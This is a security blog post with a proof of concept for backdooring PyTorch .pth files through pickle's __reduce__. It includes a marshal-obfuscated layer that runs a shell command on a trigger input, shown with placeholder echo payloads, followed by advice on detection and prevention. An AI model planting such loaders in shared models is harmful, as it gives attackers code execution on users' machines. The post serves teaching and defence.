A PoC to make a backdoored PyTorch model

2025-11-05 2040 words 10 minutes

Contents

We see how malicious people can backdoor pth files, and how to prevent and detect it.

Introduction

For the first article of my blog, I will talk about backdoor in PyTorch model. PyTorch is a famous library that is used to create neural networks. As you might know, neural networks are functions that takes an input and returns an output, to solve a given problem (classify images, to generate a message such as in ChatGPT), etc. In particular, a given trained neural network - also called a model - can be saved into a file using a save function, and can be used later with a load function. For example, Hugging face is a website that gives the possibility for users to download and/or submit models. However, at the end, neural networks are code, and thus can contain malicious instructions such as a backdoor. In this article, we see:

How to insert a backdoor inside a pth file (i.e. a saved PyTorch model).
How to detect such a malicious pth file.

Now, let’s get started :)

Pickle

Pytorch’s model serializations are based on pickle from Python. Working on this POC was an occasion for me to be a little bit more familiar with this module. Pickle is a way to serialize python code into a file, and load it later. Example:

        
        
        
    
import pickle

class classA:
    def __init__(self, a):
        self.a = a
    
    def show(self):
        print(f"You stored {self.a}")

A = classA(1337)

# Pickle the object A (saving it into a file data.pkl).
f = open('data.pkl', 'wb')
pickle.dump(A, f)
f.close()

# Unpickle it
f = open('data.pkl', 'rb')
A = pickle.load(f)
A.show()

The code above stores a class instance inside a file called data.pkl, and is retrieved later. Executing it gives us the expected output:

You stored 1337

Perfect. Now, what if we create another python file, and try to load the pickle data in it? Let’s try:

        
# -- In a different file --
import pickle
f = open('data.pkl', 'rb')
A = pickle.load(f) # Error

Executing it give us:

AttributeError: Can't get attribute 'classA' on <module '__main__'.

This was a bit surprising for me because I thought the class was completely contained in my serialized file data.pkl. But actually, pickle does not serialize all the code, but rather a reference to the class. In other words, to make the code to work, we have to define classA inside the new file.

So good so far, but why pickle unserializations are dangerous then? Well actually, we can still execute arbitrary code during pickle’s loading. This is because pickle use the method __reduce__ to know how to unpickle a file. In particular, one can put malicious code inside this method:

        
        
        
    
import pickle
import os

class classA:
    def __init__(self, a):
        self.a = a

    def __reduce__(self):
        os.system('echo system inside the __reduce__ function.')
        return (os.system, ('echo malicious command',))

    def show(self):
        print(f"You stored {self.a}")


A = classA(1337)

# Pickle the object A (saving it into a file data.pkl).
print("Saving")
f = open('data.pkl', 'wb')
pickle.dump(A, f)
f.close()   


# Unpickle it
print("Loading")
f = open('data.pkl', 'rb')
A = pickle.load(f) # Print malicious command
A.show() # Error

This gives the output

        
        
        
    
Saving
system inside the __reduce__ function.
Loading
malicious command
Traceback (most recent call last):
  File "/hacktelligence/test2.py", line 29, in <module>
    A.show() # Error
    ^^^^^^
AttributeError: 'int' object has no attribute 'show'

We considered the same code than before, except that we add a __reduce__ method to the class. The method returns a tuple where its first element is the function/class we want to instantiate, and the second element is a tuple giving the parameters to instantiate the function/class. Here, we ask to pickle.load to instantiate the function os.system with the parameter echo malicious command. Thus, when we call pickle.load, the malicious command is executed. We also notice that the code inside the __reduce__ function is executed only during saving! Also the output of os.system('echo malicious command') (which is the int 0) is returned to the variable A. That is why we get an error when we call A.show().

Also, an important thing to notice is that if you run the pickle.load command inside another file, it works! The malicious command is executed. The reason why it executes sucessfully is because we use a simple function such as os.system which is well defined in Python. In general we can do it with any built-in functions, but if we try to insert our own class or function in the following way:

return (classA, (5,))

and load it in another file where classA is not defined, you will get again the error:

AttributeError: Can't get attribute 'classA' on <module '__main__'.

Pytorch (de)serialization (pth format)

To make this article, I used Python 3.13.5 and PyTorch 2.8.0+cu128. But the concepts should not be different across the different versions. Here is a minimal code to save and load a model with PyTorch:

        
        
        
    
import torch
import torch.nn as nn

class CustomizedLayer(nn.Module):
    def __init__(self):
        super().__init__()

    def forward(self, x):
        return x + 1


# Create a neural network.
model = nn.Sequential(*[
    CustomizedLayer(),
    nn.Linear(8, 16),
    nn.ReLU(),
    nn.Linear(16, 1),
    nn.ReLU()
])

# Use our neural network on an input
x = torch.randn(8)
print("Result of the nn:", model(x))

# Save it
torch.save(model, 'model.pth')

# Load it
model = torch.load('model.pth', weights_only=False)

# Execute it again.
print("Result of the nn:", model(x))

The output is:

        
Result of the nn: tensor([0.0249], grad_fn=<ReluBackward0>)
Result of the nn: tensor([0.0249], grad_fn=<ReluBackward0>)

This creates a pth file which is actually an archive that we can unzip:

        
        
        
    
$ unzip model.pth
Archive:  model.pth
 extracting: model/data.pkl          
 extracting: model/.format_version   
 extracting: model/.storage_alignment  
 extracting: model/byteorder         
 extracting: model/data/0            
 extracting: model/data/1            
 extracting: model/data/2            
 extracting: model/data/3            
 extracting: model/version           
 extracting: model/.data/serialization_id 

The file model/data.pkl contains the reference to the different layers of our neural network, and model/data/* contains the weights and biaises. In particular, we can see at the file extension that the data.pkl is created using pickle. So it means (as specified in PyTorch documentation) that when we load a PyTorch model, we unpickle a file. It also means that there is a risk to execute malicious code! :(

Backdoor PoC

From the previous discussion, it is clear that pth file can contain malicious instructions, I give here a simple PoC to do that:

        
        
        
    
import torch
import torch.nn as nn
import os

class CustomizedLayer(nn.Module):
    def __init__(self):
        super().__init__()

    def __reduce__(self):
        return (os.system, ('echo malicious command',))


    def forward(self, x):
        return x + 1


# Create a neural network.
model = nn.Sequential(*[
    CustomizedLayer(),
    nn.Linear(8, 16),
    nn.ReLU(),
    nn.Linear(16, 1),
    nn.ReLU()
])

# Use our neural network on an input
x = torch.randn(8)
print("Result of the nn:", model(x))

# Save it
torch.save(model, 'model.pth')

# Load it
model = torch.load('model.pth', weights_only=False)

# Execute it again.
print("Result of the nn:", model(x))

Basically, we take the code from before and add the method __reduce__ to the malicious layer. Its execution gives the following output:

        
Result of the nn: tensor([0.7658], grad_fn=<ReluBackward0>)
malicious command
TypeError: 'int' object is not callable

The malicious command is executed, perfect! But there is an error. Actually this is the same we have seen in the pickle section. Pickle look at __reduce__ to reconstruct the class CustomizedLayer, but we execute the command os.system('echo malicious command') and instead of returning a CustomizedLayer Object, we return an int.

So basically, people that load the model will execute the malicious code, but they load an unusable model which is actually an integer. Not very subtle for a backdoor. The goal of the next PoC is to show that a malicious person can actually create a usable model that contains a backdoor.

        
        
        
    
import torch
import torch.nn as nn
import marshal

class Wrapper(nn.Module):
    def __init__(self):
        super().__init__()

    def __reduce__(self):
        src = "def _payload():\n    class CustomizedLayer(torch.nn.Module):\n        def __init__(self):\n            super().__init__()\n        def forward(self, x):\n            if(torch.equal(x, torch.zeros(8))):\n                os.system('echo Activate backdoor.')\n            return x\n\n    return CustomizedLayer()\n"
        compiled = compile(src, "<string>", "exec")

        bytecodes = marshal.dumps(compiled.co_consts[0])

        expr = (
            "__import__('types').FunctionType("
            "__import__('marshal').loads(" + repr(bytecodes) + "), "
            "{'os': __import__('os'), '__builtins__': __import__('builtins'), "
            "'torch': __import__('torch')}"
            ")()"
        )

        return (eval, (expr,))


    def forward(self, x):
        return x


# Create malicious neural network
model = nn.Sequential(*[
    Wrapper(),
    nn.Linear(8, 16),
    nn.ReLU(),
    nn.Linear(16, 1),
    nn.ReLU()
])

x = torch.randn(8)

print(model(x).shape)

torch.save(model, 'model.pth')

test = torch.load('model.pth', weights_only=False)

print(test(x))

# Activate backdoor.
print(test(torch.zeros(8)))

Let’s analyze the code above. In a nutshell, we create a fake neural network layer called Wrapper in our model such that when it is loaded by torch.load, it creates a true neural network layer called CustomizedLayer that contains the backdoor. The payload variable is equal to the following:

        
        
        
    
def _payload():
    class CustomizedLayer(torch.nn.Module):
        def __init__(self):
            super().__init__()
        def forward(self, x):
            if(torch.equal(x, torch.zeros(8))):
                os.system('echo Activate backdoor.')
            return x

    return CustomizedLayer()

It works like a classical neural network layer, except that when the input of the neural network is zero then it activates the backdoor. We compile this payload to obtain python bytecode that we evaluate then by using the variable expr. This last part uses a rather obscure function called FunctionType. You can read more about it on https://stackoverflow.com/questions/10303248/true-dynamic-and-anonymous-functions-possible-in-python. Basically, evaluating expr consists in doing:

        
import types
import marshal
loaded_bytecodes = marshal.loads(repr(bytecodes))
globals = {'os': __import__('os'), '__builtins__': __import__('builtins'), 'torch': __import__('torch')}
FunctionType(loaded_bytecodes, globals)

In other words, it creates a dynamic function with the payload bytecodes, using the given globals that ensures that the packages are imported.

The output of the complete PoC is:

        
torch.Size([1])
tensor([0.2968], grad_fn=<ReluBackward0>)
Activate backdoor.
tensor([0.2461], grad_fn=<ReluBackward0>)

However, the PoC uses Python bytecodes with Marshal, which might cause compatibility issues with a different version of Python. To be honest, I did not find a way to do it without bytecodes, so if you have any insights, don’t hesitate to contact me! I tried on Python 3.13.3, it worked like a charm. However on Python 3.10.5 I got

ValueError: bad marshal data (unknown type code)

Protection and Detection

Now the questions are

How to avoid installing a backdoor when doing machine learning?
How to detect a malicious pth file?

For the first question, I would naively say to never install a non-trusted model from a weird source, but this might be not satisfying as an answer. In PyTorch, there is a security which is supposed to prevent the execution of arbitrary code when loading a model. This security is activated by default and consists in putting the parameter weights_only to True. Indeed, if we try to load the backdoored model above, we get this error

        
_pickle.UnpicklingError: Weights only load failed. This file can still be loaded, to do so you have two options, do those steps only if you trust the source of the checkpoint. 
	(1) In PyTorch 2.6, we changed the default value of the `weights_only` argument in `torch.load` from `False` to `True`. Re-running `torch.load` with `weights_only` set to `False` will likely succeed, but it can result in arbitrary code execution. Do it only if you got the file from a trusted source.
	(2) Alternatively, to load with `weights_only=True` please check the recommended steps in the following error message.
	WeightsUnpickler error: Unsupported global: GLOBAL torch.nn.modules.container.Sequential was not an allowed global by default. Please use `torch.serialization.add_safe_globals([torch.nn.modules.container.Sequential])` or the `torch.serialization.safe_globals([torch.nn.modules.container.Sequential])` context manager to allowlist this global if you trust this class/function.

Check the documentation of torch.load to learn more about types accepted by default with weights_only https://pytorch.org/docs/stable/generated/torch.load.html.

As we try to load a model, it might be tempting to just add weights_only=False to the torch.load function to fix this error, without giving a second thought. From what we discuss in this article, we now know what are the risks when we do so.

If we follow those two rules, it should be enough to prevent most of the attacks. However, we are never too careful, especially when a recent exploit allows to bypass weights_only=True in version of PyTorch < 2.6: https://nvd.nist.gov/vuln/detail/CVE-2025-32434

For the detection, on my current PoC it is rather easy. You can just unzip the pth file, do

        
$ strings data.pkl
[...]
eval
__import__('types').FunctionType(__import__('marshal').loads(b'\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x03\x00\x00\x00\xf3V\x00\x00\x00\x95\x00\x18\x00"\x00S\x01\x1a\x00S\x02[\x00\x00\x00\x00\x00\x00\x00\x00\x00R\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00R\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x005\x03\x00\x00\x00\x00\x00\x00n\x00U\x00"\x005\x00\x00\x00\x00\x00\x00\x00$\x00)\x03Nc\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\xf3.\x00\x00\x00^\x00\x95\x00\\\x00r\x01S\x00r\x02S\x01r\x03U\x004\x01S\x02\x1a\x00j\x08r\x04S\x03\x1a\x00r\x05S\x04r\x06U\x00=\x01r\x07$\x00)\x05\xda!_payload.<locals>.CustomizedLayer\xe9\x02\x00\x00\x00c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x13\x00\x00\x00\xf3"\x00\x00\x00>\x01\x95\x00[\x00\x00\x00\x00\x00\x00\x00\x00\x00T\x01U\x00]\x05\x00\x005\x00\x00\x00\x00\x00\x00\x00 \x00g\x00)\x01N)\x02\xda\x05super\xda\x08__init__)\x02\xda\x04self\xda\t__class__s\x02\x00\x00\x00 \x80\xda\x08<string>r\x07\x00\x00\x00\xda*_payload.<locals>.CustomizedLayer.__init__\x03\x00\x00\x00s\x0e\x00\x00\x00\xf8\x80\x00\xdc\x0c\x11\x89G\xd1\x0c\x1c\xd5\x0c\x1e\xf3\x00\x00\x00\x00c\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x13\x00\x00\x00\xf3\x8c\x00\x00\x00\x95\x00[\x00\x00\x00\x00\x00\x00\x00\x00\x00R\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00U\x01[\x00\x00\x00\x00\x00\x00\x00\x00\x00R\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00S\x015\x01\x00\x00\x00\x00\x00\x005\x02\x00\x00\x00\x00\x00\x00(\x00\x00\x00\x00\x00\x00\x00a\x15\x00\x00[\x06\x00\x00\x00\x00\x00\x00\x00\x00R\t\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00S\x025\x01\x00\x00\x00\x00\x00\x00 \x00U\x01$\x00)\x03N\xe9\x08\x00\x00\x00z\x17echo Activate backdoor.)\x05\xda\x05torch\xda\x05equal\xda\x05zeros\xda\x02os\xda\x06system)\x02r\x08\x00\x00\x00\xda\x01xs\x02\x00\x00\x00  r\n\x00\x00\x00\xda\x07forward\xda)_payload.<locals>.CustomizedLayer.forward\x05\x00\x00\x00s-\x00\x00\x00\x80\x00\xdc\x0f\x14\x8f{\x89{\x981\x9ce\x9fk\x99k\xa8!\x9bn\xd7\x0f-\xd1\x0f-\xdc\x10\x12\x97\t\x91\t\xd0\x1a3\xd4\x104\xd8\x13\x14\x88Hr\x0c\x00\x00\x00\xa9\x00)\x08\xda\x08__name__\xda\n__module__\xda\x0c__qualname__\xda\x0f__firstlineno__r\x07\x00\x00\x00r\x15\x00\x00\x00\xda\x15__static_attributes__\xda\r__classcell__)\x01r\t\x00\x00\x00s\x01\x00\x00\x00@r\n\x00\x00\x00\xda\x0fCustomizedLayerr\x03\x00\x00\x00\x02\x00\x00\x00s\x12\x00\x00\x00\xf8\x86\x00\xf5\x02\x01\t\x1f\xf7\x04\x03\t\x15\xf0\x00\x03\t\x15r\x0c\x00\x00\x00r\x1e\x00\x00\x00)\x03r\x0f\x00\x00\x00\xda\x02nn\xda\x06Module)\x01r\x1e\x00\x00\x00s\x01\x00\x00\x00 r\n\x00\x00\x00\xda\x08_payloadr!\x00\x00\x00\x01\x00\x00\x00s!\x00\x00\x00\x80\x00\xf4\x02\x06\x05\x15\x9c%\x9f(\x99(\x9f/\x99/\xf4\x00\x06\x05\x15\xf1\x10\x00\x0c\x1b\xd3\x0b\x1c\xd0\x04\x1cr\x0c\x00\x00\x00'), {'os': __import__('os'), '__builtins__': __import__('builtins'), 'torch': __import__('torch')})()q)
[...]

Detecting the use of eval or marshal inside the data.pkl is sufficiently suspicious to classify the model as malicious. It would be very interesting to go more in details into this direction in another article. You can see https://www.rapid7.com/blog/post/from-pth-to-p0wned-abuse-of-pickle-files-in-ai-model-supply-chains/ for more information about this. Also, the Fickling might be also interesting to analyze pickle file: https://github.com/trailofbits/fickling.

Conclusion

In conclusion, never load an unknown model. Except if you want to lose the control of your machine :)

        
exit()